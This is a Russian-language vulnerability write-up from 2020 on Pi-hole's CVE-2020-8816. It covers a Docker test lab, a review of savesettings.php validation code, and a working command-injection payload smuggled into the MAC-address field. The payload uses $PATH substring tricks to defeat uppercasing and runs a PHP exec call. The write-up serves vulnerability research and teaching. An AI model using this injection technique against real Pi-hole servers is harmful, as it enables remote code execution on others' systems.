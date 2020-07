В Pi-hole — популярной программе для блокировки рекламы и нежелательных скриптов — за последнее время нашли целых три уязвимости. Две из них приводят к удаленному выполнению команд, а одна позволяет повысить привилегии до root. Давай разберем причины проблем и заодно посмотрим, как искать уязвимости в коде на PHP и скриптах на Bash.

Pi-hole — это DNS-сервер и небольшой веб-интерфейс для настройки блокировщика и просмотра статистики. Приставка Pi тут неспроста, поскольку разработчики предполагали, что ставить их софт будут на Raspberry Pi (а заодно название звучит как «дырка для пирога»). При этом ничто в целом не мешает ставить Pi-hole и на другое железо.

Коротко CVE-2020-8816 — эта уязвимость в Pi-hole существует из-за некорректной санитизации MAC-адреса при добавлении его в список. Специально сформированный MAC-адрес позволяет злоумышленнику внедрить свои команды в строку вызова. Баг затрагивает все версии Pi-hole до 4.3.2 включительно. CVE-2020-11108 — обновление скрипта Gravity в Pi-hole до версии 4.4 позволяет загружать произвольные файлы в веб-директорию системы. Злоумышленник может загрузить PHP-файл, содержащий вредоносный код. Ошибка находится в функции gravity_DownloadBlocklistFromUrl в файле gravity.sh. Также она может быть использована в сочетании с правилом sudo для пользователя www-data, чтобы выполнить повышение привилегий до суперпользователя.

Нашли уязвимости Ник Фришетт (Nick Frichette), разработчик и ИБ-исследователь из США, и Франсуа Рено-Филиппон (François Renaud-Philippon) — ИБ-исследователь из Канады.

Стенд

Начнем со стенда. Тут все просто, разработчики Pi-Hole предоставляют официальный контейнер Docker с дистрибутивом. Для тестирования всех уязвимостей воспользуемся версией 4.3.2.

docker run --rm --name pihole --hostname pihole -p80:80 -p53:53 pihole/pihole:4.3.2

После непродолжительной загрузки на 80 порту можно найти веб-интерфейс администратора.

Пароль будет сгенерирован в процессе загрузки контейнера и выведен в консоль.

Теперь осталось скачать исходники админской панели с GitHub (ZIP) — и можно приступать к разбору уязвимости.

RCE через MAC-адрес

Для начала обратимся к исходным кодам приложения, раз они имеются. В первую очередь проверим наличие RCE. Для этого поищем в коде на PHP основные функции, которые допускают исполнение кода. Я буду использовать PHPStorm и следующую регулярку.

(exec|passthru|system|shell_exec|popen|proc_open|pcntl_exec)\s*\(

Она не идеальна, но для быстрого поиска сгодится.

Сразу видим, что нашлась пачка интересных мест. Давай посмотрим на них поближе.

Начнем с файла savesettings.php . Он отвечает за сохранение настроек в разделе Settings, для каждой вкладки есть отдельная ветка кода.

scripts/pi-hole/php/savesettings.php

216: // Process request 217: switch ($_POST["field"]) { 218: // Set DNS server 219: case "DNS": ... 383: case "API": ... 548: case "DHCP":

Нас интересует вкладка DHCP, там происходит подозрительный вызов функции exec .

scripts/pi-hole/php/savesettings.php

548: case "DHCP": 549: 550: if(isset($_POST["addstatic"])) 551: { 552: $mac = $_POST["AddMAC"]; 553: $ip = $_POST["AddIP"]; 554: $hostname = $_POST["AddHostname"]; ... 605: exec("sudo pihole -a addstaticdhcp ".$mac." ".$ip." ".$hostname);

В процессе выполнения происходит вызов утилиты pihole, где в качестве параметров командной строки передаются значения AddMAC , AddIP , AddHostname из POST-запроса. Первая мысль: просто внедрить свою команду при помощи && или || . Однако переменные предварительно проходят некоторые проверки. Давай посмотрим на них. Начнем с IP.

scripts/pi-hole/php/savesettings.php

562: if(!validIP($ip) && strlen($ip) > 0) 563: { 564: $error .= "IP address (".htmlspecialchars($ip).") is invalid!<br>"; 565: }

Помимо двух регулярок, выполняется проверка встроенной в PHP функцией filter_var с опцией FILTER_VALIDATE_IP.

scripts/pi-hole/php/savesettings.php

14: function validIP($address){ 15: if (preg_match('/[.:0]/', $address) && !preg_match('/[1-9a-f]/', $address)) { 16: // Test if address contains either `:` or `0` but not 1-9 or a-f 17: return false; 18: } 19: return !filter_var($address, FILTER_VALIDATE_IP) === false; 20: }

Здесь особо не разгуляешься, и пропихнуть левые символы не удастся. Тогда переходим к hostname .

scripts/pi-hole/php/savesettings.php

567: if(!validDomain($hostname) && strlen($hostname) > 0) 568: { 569: $error .= "Host name (".htmlspecialchars($hostname).") is invalid!<br>"; 570: }

Тут уже три регулярки. Первая запрещает использовать любые символы, кроме цифр, a-z , точки, минуса и подчеркивания, а остальные проверяют длину строки.

scripts/pi-hole/php/savesettings.php

36: function validDomain($domain_name) 37: { 38: $validChars = preg_match("/^([_a-z\d](-*[_a-z\d])*)(\.([_a-z\d](-*[a-z\d])*))*(\.([a-z\d])*)*$/i", $domain_name); 39: $lengthCheck = preg_match("/^.{1,253}$/", $domain_name); 40: $labelLengthCheck = preg_match("/^[^\.]{1,63}(\.[^\.]{1,63})*$/", $domain_name); 41: return ( $validChars && $lengthCheck && $labelLengthCheck ); //length of each label 42: }

Здесь тоже нет возможности внедрить нужные нам символы.

Остается MAC-адрес.

scripts/pi-hole/php/savesettings.php

556: if(!validMAC($mac)) 557: { 558: $error .= "MAC address (".htmlspecialchars($mac).") is invalid!<br>"; 559: }

scripts/pi-hole/php/savesettings.php

53: function validMAC($mac_addr) 54: { 55: // Accepted input format: 00:01:02:1A:5F:FF (characters may be lower case) 56: return (preg_match('/([a-fA-F0-9]{2}[:]?){6}/', $mac_addr) == 1); 57: }

А вот здесь нас ждет удача. Регулярка говорит нам, что строка должна содержать 6 пар символов английского алфавита и цифр и они могут быть разделены двоеточием или нет. Но вот незадача, отсутствуют символы начала и конца строки. Это значит, что достаточно, чтобы было как минимум одно вхождение такой регулярки, а помимо нее можно указывать все что хочется.

Однако здесь нас поджидает небольшая проблемка.

scripts/pi-hole/php/savesettings.php

560: $mac = strtoupper($mac);

Все буквы в строке с MAC-адресом переводятся в верхний регистр. Так как команды в Linux регистрозависимы, не получится просто внедрить нужную, придется искать обход. К счастью, шелл в Linux очень гибкая штука и сделать байпасс не составит труда. Если бы функция exec использовала интерпретатор bash для выполнения команд, то решение было бы совсем простым: начиная с четвертой версии в Bash появилась конструкция вида ${VAR,,} , которая меняет регистр букв на строчные в значении переменной. Но exec использует /bin/sh .

Но не стоит отчаиваться, ведь у нас есть переменные окружения. Всеми любимая $PATH как раз состоит из букв верхнего регистра и содержит большое количество символов нижнего. Добавим новую запись с MAC-адресом 000000000000$PATH , чтобы увидеть содержимое этой переменной окружения.

По умолчанию в контейнере она имеет следующий вид:

/opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Чтобы не собирать всю необходимую команду из этих букв, воспользуемся php , так как местные функции регистронезависимы. Вот мой пейлоад:

php -r 'exec(strtolower("echo 1 > /tmp/owned"));'

Чтобы исключить любые проблемы с символами в длинных командах, можно воспользоваться функцией hex2bin вместо strtolower , но для моего пейлоада сгодится и эта.

Получается, что нам нужны символы p , h и r . Воспользуемся символами замены и удаления подстроки. Символ p находится на третьей позиции. Конструкция A=${PATH#??} удалит первые два символа, и в переменной A останется такая подстрока:

pt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Теперь из нее нужно удалить все, кроме первого символа, для этого используем P=${A%${A#?}} .

Теперь h . Он находится на восьмой позиции, поэтому удаляем первые семь символов A=${PATH#???????} . Оставляем только первый символ при помощи уже известной нам конструкции H=${A%${A#?}} .

И наконец — r . Удаляем все символы начиная с первого слеша до первого двоеточия плюс три символа: A=${PATH#/*:???} . В итоге останется такая подстрока:

r/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Снова оставляем только первый символ R=${A%${A#?}} .

WWW Подробнее про манипуляцию со строками можно прочитать в мануале Bash, там все подробно расписано с примерами использования.

Собираем все наши конструкции вместе и получаем:

A=${PATH#??};P=${A%${A#?}};A=${PATH#???????};H=${A%${A#?}};A=${PATH#/*:???};R=${A%${A#?}};

Теперь в переменных $P , $H и $R находятся буквы p , h и r в нижнем регистре.

Можно формировать основной пейлоад.

000000000000;A=${PATH#??};P=${A%${A#?}};A=${PATH#???????};H=${A%${A#?}};A=${PATH#/*:???};R=${A%${A#?}};$P$H$P -$R 'exec(strtolower("echo 1 > /tmp/owned"));';

Отправляем его в качестве MAC-адреса и можем видеть файл owned в директории /tmp .

Точно такая же проблема присутствует в функции удаления существующего MAC-адреса.